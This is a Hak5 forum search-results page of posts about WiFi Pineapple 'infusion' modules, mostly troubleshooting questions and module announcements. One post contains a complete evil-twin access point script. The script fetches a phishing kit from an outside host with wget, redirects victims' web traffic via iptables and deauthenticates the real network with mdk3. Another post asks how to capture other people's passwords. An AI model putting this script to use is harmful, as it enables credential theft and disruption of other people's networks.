Jump to content

Search the Community

Showing results for tags 'infusion'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 13 results

  1. I have minimized several infusions and now they will not come back to the interface. Configuration is one of them so I cannot factory reset the pineapple. Trying to SSH in fails with permission denied. Is there a fix for this issue? How can i restore the infusions so they are accessible?
  2. Hello everyone, I have just upgraded my wifi pineapple to the latest version 2.4.0 manually since I couldn't do it from pineapple web gui Now I would like to install other infusion than the default ones' WHen I click on the pine bar and do a refresh no infusion is listed. WHat should I do to enhance my pineapple mark v Best regards,
  3. SSL stripping no longer works. I've been researching but gotten little results as to tutorials for other types of infusions. I want to get an infusion that can either get me wifi passwords or passwords to someone's accounts as they log into them. If possible, I would like some er infusions to start with downloading. I tried the wps infusion and it didn't work well with my router (which is why I want to use RubyReaver or Auto-Reaver). So, what other infusions could be used to monitor my other computer's web activities and the passwords that I get when I log in with my other computer (that I'm using as a target)? If possible, it would be nice if it was something I could use information I get from the PineAP log and input into such an infusion to get my passwords. I learned from this video about how to use the pineAP: https://www.youtube.com/watch?v=IdhuX4BEK6s&index=2&list=PLuXfzxj2yX_uCE8dPbP39rQIB0a8PkFHT So yeah, I don't want to buy too many new devices. I want to rely on my pineapple, but if possible I might want the documentation or something similar to learn to use such infusions. I might plug a wireless modem into my pineapple someday and go wardriving, but I want to learn to hack my own wifi first to learn before I go wardriving.
  4. Nbt Scan is a UI Front End for the nbtscan tool which performs netbios name scanning. Change Log: 1.1 Added ability to clear results Added ability to view routing table Added a link to forum support topic Small tile no longer checks for internet connection A few UI changes Fixed a command injection vulnerability 1.0 - Initial Release ​Ability to use NBT Scan from the web interface Ability to install dependencies from the webinterface Ability to scan other networks rather than just the pineapples network Ability to review and delete previous nbt scans https://www.youtube.com/watch?v=YoUEACISRpw
  5. I'm working on an eviltwin infusion for the pineapple but still have a long way to go. So far Im writting an eviltwin script without the pineapple to make sure I get that right. The script still need some work. I need help to improve it. Im writting the script base on this video #touch eviltwin #nano eviltwin (copy & paste script) #chmod +x eviltwin #./eviltwin (This will not setup your mysql database) #!/bin/bash ########################################## # Evil Twin Access Point v0.1 # # # # written by: sithstalker # # not yet tested on wifi pineapple # ########################################## #Downloading www files echo "downloading www files..." DIR1="/var/www/styles" if [ -d "$DIR1" ]; then echo "You already have the eviltwin files..." sleep 2; else echo "Getting the /var/www eviltwin files and creating backup to /var/orig-www" sleep 2; mkdir /var/orig-www && mv /var/www/* /var/orig-www/ cd /var/www && wget http://hackthistv.com/eviltwin.zip sleep 2; unzip eviltwin.zip sleep 2; fi #Killing active processes echo "Killing airbase-ng" pkill airbase-ng sleep 2; echo "Killing dhcpd" pkill dhcpd3 sleep 2; #Getting required informations echo -n "Enter you local ip address and press [ENTER] (e.g. 192.168.1.45): " read lhost echo -n "Enter your wlan interface and press [ENTER] (e.g. wlan0): " read wlan_int echo -n "Enter the subnet for your DHCP scope and press [ENTER] (e.g. 192.168.1.128): " read dhcp_subnet echo -n "Enter the subnetmask for your DHCP scope and press [ENTER] (e.g. 255.255.255.128): " read dhcp_subnetmask echo -n "Enter the broadcast address for your dhcp scope and press [ENTER] (e.g. 192.168.1.255): " read dhcp_broadcast echo -n "Enter the default gateway for your DHCP Scope and press [ENTER] (e.g. 192.168.1.129): " read dhcp_dgw echo -n "Enter the DNS Server for your DHCP Scope and press [ENTER] (e.g. 8.8.8.8): " read dhcp_dns echo -n "Enter the start address of your DHCP scope and press [ENTER] (e.g. 192.168.1.100): " read dhcp_start echo -n "Enter the last address of your DHCP scope and press [ENTER] (e.g. 192.168.1.150): " read dhcp_last echo -n "Enter the SSID you like to use for your Access Point and press [ENTER] (e.g. eviltwin): " read ssid echo -n "Enter the Channel you like to use for your Access Point and press [ENTER] (e.g. 11): " read channel echo -n "Enter the interface name which is connected to the internet and press [ENTER] (e.g. eth0): " read inet_int echo -n "Enter the target Bssid and press [ENTER] (e.g. SI:TH:ST:AL:KE:R0): " read bssid #Setting dhcpd config to /etc/dhcp3/dhcpd.conf echo "setting dhcpd config in /etc/dhcp/dhcpd.conf" sleep 2; #check if there already is a backup directory for the original dhcpd.conf file DIR="/etc/dhcp/orig_conf" if [ -d "$DIR" ]; then echo "You already have a backup directory for the original dhcpd.conf" sleep 2; else echo "You do not have a backup directory for the original dhcpd.conf file... I will create one" sleep 2; mkdir /etc/dhcp/orig_conf fi #check if there already is a backup of the original dhcpd.conf file. If not one will be created if [ "$(ls -A $DIR)" ]; then echo "You already have a backup of the original configuration file in /etc/dhcp/orig_conf" sleep 2; else echo "creating backup of original dhcpd config file to /etc/dhcp/orig_conf" sleep 2; cp /etc/dhcp/dhcpd.conf /etc/dhcp/orig_conf/dhcpd.conf rm /etc/dhcp/dhcpd.conf fi echo "default-lease-time 600; max-lease-time 7200; authoritative; subnet $dhcp_subnet netmask $dhcp_subnetmask { option subnet-mask $dhcp_subnetmask; option broadcast-address $dhcp_broadcast; option routers $dhcp_dgw; option domain-name-servers $dhcp_dns; range $dhcp_start $dhcp_stop; }" > /etc/dhcp/dhcpd.conf #Starting monitor mode on $wlan_int echo "putting $wlan_int into monitor mode. You can check that later by using iwconfig command" sleep 2; airmon-ng stop $wlan_int sleep 5; airmon-ng start $wlan_int sleep 5; ################################################################### #Starting airbase-ng with SSID=$ssid and channel=$channel echo "starting airbase-ng with SSID $ssid and channel $channel" sleep 2; airbase-ng -e $ssid -c $channel -P mon1 & sleep 5; ################################################################### #starting new generated interface at0 and assign ip address echo "starting at0 with ip $dhcp_dgw and subnetmask $dhcp_subnet and create a route for that" sleep 2; ifconfig at0 down sleep 2; ifconfig at0 $dhcp_dgw netmask $dhcp_subnetmask sleep 2; ifconfig at0 up sleep 2; route add -net $dhcp_subnet netmask $dhcp_subnetmask gw $dhcp_dgw sleep 2; #Setup iptables with nat for the new network echo "setting up iptables with nat for the new network" sleep 2; iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain #iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o $inet_int -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $lhost:80 iptables -t nat -A POSTROUTING -j MASQUERADE #Clear DHCP leases echo "clearing dhcp leases" sleep 2; echo > '/var/lib/dhcp/dhcpd.leases' #creating a symlink to dhcpd.pid #ln -s /var/run/dhcp3-server/dhcp.pid /var/run/dhcpd.pid #start dhcp server and enable ip forwarding echo "starting dhcp and enabling ip forwarding" sleep 2; #dhcpd3 -d -f -cf /etc/dhcp/dhcpd.conf at0 & dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 echo "1" > /proc/sys/net/ipv4/ip_forward /etc/init.d/isc-dhcp-server start echo $bssid > blacklist mdk3 mon1 d -b blacklist -c $channel
  6. Has anyone tried the ardronepwn infusion. How to execute ardronepwn infusion and make it start working
  7. hey, I'm encountring difficulties to install an infusion on my PineApple Mark V that running 2.2.0 firmware. -When i try to install an infusion from the PineApple Bar:Available, it needs to download the infusion on SD card. Why it can't install 11kb into 88kb free space? screenshot 1 -So i choose to download on SD card.=> screenshot 2 -It says the infusion is on sd card and it's installing in the web interface => screenshot 3 -When i check the PineApple Bar: Installed. => screenshot 4 I think it's a firmware bug. Can I fixe it by any commands? or should i flash my PineApple? Every Advices are wellcome =) You also can find me on IRC #pineapple
  8. Hello Everyone, I'm new to the penetration testing / 'hacker' scene, but I'm eager to learn more. I have purchased a wifi pineapple and love it. It is a great way of learning loads of new things and understanding how wifi works and the inherent trust all of our much loved devices have with wifi networks. This brings me onto my main point of this thread. I recently came across this tool, http://hack-tools.blackploit.com/2015/01/linset-wpawpa2-hack-without-brute-force.html?m=1, after reading about it, it seems like it could be a really useful tool in gaining access to WPA and WPA2 wifi networks, which I understand to be the most commonly used wifi security protocols. My questions are: 1. Does anyone have any thoughts or experience with this tool, is it any good, does it work? 2. It seems to me that if this tool does work it would be a great addition to the wifi pineapple, especially if it could make use of PIneAP and Karma. So would anybody be able to make an infusion for the pineapple to replicate the way this tool works? Thanks for reading
  9. Hi, I've a Mark V with firmware 2.1.1 running. I was trying to create the ExampleInfusion from the wiki, but the API used seem to be outdated. When looking in the changelog, I've seen that some changes have been made in the API and are refering to http://wiki2.wifipineapple.com/#!api.md (2.0.4) and http://wiki.wifipineapple.com/index.php?title=Webinterface_API (2.0.0). Both URL's seem to be incorrect (404 error reply). I've seen the http://wiki.wifipineapple.com/?#!api.md, but this one seem to be incomplete (looking in other infusions using other functions). Can someone tell me where I can find the documentation for API 2.1.1 and maybe also fix the URL's and examples? Blackcap
  10. Hi there! I just got my hand on the Hak5 toys today, i'm very exited to try to creat new infusion help and learn with the community, how does the infusions work? are they based on any language, python, perl, ruby, php? Sorry for the noob question but I jump right over here before trying to research more and I will once this is posted.. So, I've beeing playing with the FruityWifi project for a few months and xtr4ange have some new cool modules in his project that I would like to port it to my brand new Wifi Pineapple mark V Woud it be easy to port this module to a infusion? https://raw.githubusercontent.com/xtr4nge/whatsapp_discover/master/whatsapp_discover.pl Thanks and Cheers!
  11. Can anyone suggest a single infusions solution or perhaps a set of infusions that would create a solution to what I thought would be a simple fix but alas, I'm missing something. I want to do the following on a pentest: - Warwalk my client's campus - full packet capture with radio spinning on channels 1-11 - ability to save the full packet, multiple channel, survey to a dump, or cap file for review in Wireshark **************************** I tried Wifi Survey - doesn't allow channel spinning and writing to a file like Kismet or airodump I tried tcpdump - it seems to work intermittently, but when I choose the monitor mode option it says it doesn't support monitor mode which seemed strange to me I tried Karma - hoping that maybe the same data would basically be in the log files but the radio doesn't spin on the various channels and do full packet capture resulting in a dump file unless I just missing something obvious ****************************** Basically, I need Kismet with GPS, full packet capture on channels 1-11 and save it to a dump/cap file. I'm hoping to set everything up, unplug, stick in my bag and warwalk.
  12. Hi everyone, Complete newbie here. Are there specific forums or wikis for infusions? If I want more information or having an issue with an infusion where do I go?
  13. Hey guys :) So a new module for the new Mark V :), an easy dipswitch modifier. Currently the one included to me seems a bit confusing. But that's probably just me... :P :D So 'Switch' will be a visualised version of the included one as an infusion, with some pretty graphics and multiline textboxes. Pics Soon -Foxtrot
×
×
  • Create New...